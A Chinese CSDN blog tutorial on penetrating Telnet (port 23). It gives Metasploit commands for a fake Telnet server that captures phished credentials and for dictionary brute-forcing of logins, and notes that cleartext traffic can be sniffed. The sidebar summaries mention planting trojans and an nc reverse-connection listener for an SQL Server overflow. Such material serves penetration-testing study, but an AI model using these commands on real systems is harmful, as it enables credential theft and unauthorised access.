端口渗透—23端口Telnet

最新推荐文章于 2024-08-31 14:37:05 发布
最新推荐文章于 2024-08-31 14:37:05 发布
阅读量5.5k 收藏 18
点赞数 1
分类专栏: 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/120315162
版权

Telnet是一种默认不加密的不安全协议,可以通过它连接到本地网络中的其他系统。

Telnet远程登录

telnet 192.168.0.124

获取Telnet服务版本

 nmap -sV -p23 <ip>

在这里插入图片描述

MITM:远程登录欺骗

通过metasploit的 auxiliary/server/capture/telnet模块在本机上设置一个虚假的telnet服务,通过钓鱼使其登录此telnet服务,一旦其尝试登录此虚假的telnet服务,我们就可以获取到他的登录凭证。这种和钓鱼有异曲同工之妙

use auxiliary/server/capture/telnet
set srvhost 192.168.0.109
set banner Hello World      ##登录telnet服务是的提示
exploit

在这里插入图片描述

我们模拟受害者使用正确的凭证登录
在这里插入图片描述

受害者登录错误,但我们却获取到了他的登录凭证
在这里插入图片描述

暴力破解登录凭证

use auxiliary/scanner/telnet/telnet_login 
msf auxiliary(telnet_login) > set rhosts 192.168.0.124 
msf auxiliary(telnet_login) > set user_file /root/user.txt 
msf auxiliary(telnet_login) > set pass_file /root/pass.txt 
msf auxiliary(telnet_login) > set stop_on_success true 
msf auxiliary(telnet_login) > exploit

嗅探Telnet凭证

默认情况下,telnet不会加密所有数据,因此若是攻击者具有telnet连接的两台机器的网络访问权限,他就可以通过中断源和目标之间的数据包,并获取身份验证和数据的详细信息

Thgilil
关注
专栏目录
Telnet弱口令渗透测试
shatianyzg的博客
07-31 800
1.对靶机系统进行服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的服务端口信息截图。靶机windows7开启telnet,用最高管理员账户作为telnet账户。2.使用hydra工具对其暴力破解,密码字典自己写好名为pass.txt。4.利用破解出来的密码登录靶机,成功登录截图。3.将破解出来的密码界面截图。...
常见的端口渗透笔录
里卡多·伊泽克森·多斯·桑托斯·达的博客
03-24 1274
常见的端口渗透笔录 这个不是我写的,朋友圈看到的
21和23端口入侵.rar
01-08
实例一:21和23端口的入侵 用到的工具 :s.exe 和 X-SCAN-V3.3 步骤1:s扫描端口 步骤二:X-SCAN 扫弱口令 步骤三:登录ftp之后看看有什么权限, 不出意外的话就是只读权限,也就说我们只可以浏览和下载他的文件,而其他一些操作比如说上传文件或新建目录的话是执行不了的,当然也不排除一些人安全意识差的可能性,所以只能碰运气了。 而23也就是telnet的弱口令更是少之又少,但是假如我们扫到的话就直接登录,后面该怎么做就不用我细说了吧,传马建帐号随便你了。下面看下ftp的演示,先去XP里面建个ftp服务器,然后用2000扫(个人比较喜欢在2000虚拟机里扫)。用户名和密码都是ftp 192.168.174 这个网段 因为这里就一台主机,我们就不用添加记事本的方式 了,直接填IP地址,有点慢,大家快进下
黑客常见攻击端口号、攻击方法及防护手段
最新发布
骑上单车去旅行的博客
08-31 406
常见的攻击端口号包括:等。黑客通过扫描目标网络的开放端口,寻找存在安全漏洞的系统,然后使用各种工具和方法进行渗透攻击,如暴力破解、字典攻击等。及时更新系统和软件补丁、配置良好的防火墙、使用强密码策略、限制开放端口的访问、监控网络流量等。
常见端口
PpikachuP的博客
03-27 1056
linux产看端口 #ss -tnl SMTP邮件服务 25端口 talnet 23端口 23端口telnet端口Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运...
23端口登录的Telnet命令+传输协议FTP命令
m0_73514785的博客
03-02 2437
FTP命令是Internet用户使用最频繁的命令之一,通过FTP命令可将文件传送到正在运行的FTP服务的远程计算机上,或从正在运行FTP服务的远程计算机上下载文件。在“命令提示符”窗口中运行“FTP”命令,即可进入FTP子环境窗口。或在“运行”对话框中运行“ftp”命令,也可进入FTP子环境窗口。例如:“Telnet 192.168.1.103 80”命令如果执行成功,则将从地址为192.168.1.103 80的远程计算机上得到Login:提示符。-n:限制FTP的自动登录,即不使用。
入侵常用端口
Jerry____的博客
06-08 1025
(转自)https://www.cnblogs.com/Zfc-Cjk/p/8460161.html 入侵常用端口详解 在渗透端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix 80 web 80-89 web 8000-9090 web 2,数据库类(扫描弱口令) 1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreSQL 3,特殊服务类(未授权/命令执行
各个网络端口的入侵方法
Gerry的专栏
08-31 1645
1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.ex
端口渗透telnet服务
马赛克的博客
03-15 2506
00x01环境准备 靶机windowserver 2003 IP:10.10.10.137 攻击机:Windows 10 注:telnet需要知道用户名和密码以及23端口开放 00x02靶机配置 启动telnet服务,windows+r输入services.msc 找到telnet设置启动 查看本地用户组 net localgroup 查看telnet成员组...
FTP与SSH等端口渗透测试手册
3. TELNET端口渗透23端口TELNET虽然因为明文传输数据而安全性较低,但在某些环境中仍被使用。手册会涵盖如何利用TELNET漏洞,以及如何安全配置服务以减少风险,例如转向使用SSH替代TELNET。 4. SMTP端口...
端口渗透总结
Coisini的博客
06-13 1350
x00 背景 在前段时间的渗透中,我发现通过端口来进行渗透有时会提升我们的效率,所以才有了这篇文章的诞生; 首先分享一份关于端口及他们对应的服务文件:https://yunpan.cn/cYyNXEpZNYvxQ 访问密码 983e 这里再分享一篇我曾经在百度文库提交的端口渗透文章:请点我 再次看这篇文章发现写的很简单,也只描述了几个常见的端口渗透;而且一般我们都是可以修 改默认端口的,所以平...
23端口工具
04-11
此为开23端口工具,大家不妨一试!
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码
04-23
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码,效率快,准确率高 还支持C段,输入一个域名可以批量关联服务器,还能自动获取2级域名和旁站域名进行安全探测
23节-暴力破解445端口.mp4
05-27
大飞哥网络安全第一阶段课程,适合0基础/初学者体系化学习,也适合老手巩固基础观看,希望大家在学习过程中理解技术原理,为更深层次的防御攻击等学习打好基础。最好别用mac,好多工具不兼容。
详细 21端口入侵
02-06
弱口令 21端口入侵
渗透测试中常用端口利用总结
xv7676的博客
04-18 674
当然这也是系统合法的服务,通常是不会被杀毒软件所查杀的。1521是大型数据库Oracle的默认监听端口,估计新手还对此端口比较陌生,平时大家接触的比较多的是Access,MSSQL以及MYSQL这三种数据库。目前黑客对80端口的攻击典型是采用SQL注入的攻击方法,脚本渗透技术也是一项综合性极高的web渗透技术,同时脚本渗透技术对80端口也构成严重的威胁。telnet是一种旧的远程管理方式,使用telnet工具登录系统过程中,网络上传输的用户和密码都是以明文方式传送的,黑客可使用嗅探技术截获到此类密码。
常见端口对应服务及其漏洞
qq_67473072的博客
07-14 2017
常见端口对应服务及其漏洞
端口攻击详解2
河北正定欢迎您-少占鱼
10-23 808
162 SNMP trap   可能是由于错误配置      177 xdmcp   许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。      513   rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供 了很有趣的信息。      553 CORBA IIOP (UDP)   如果
常见的端口漏洞
子曰小玖的博客
05-13 2694
https://blog.csdn.net/Fly_hps/article/details/85037179
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值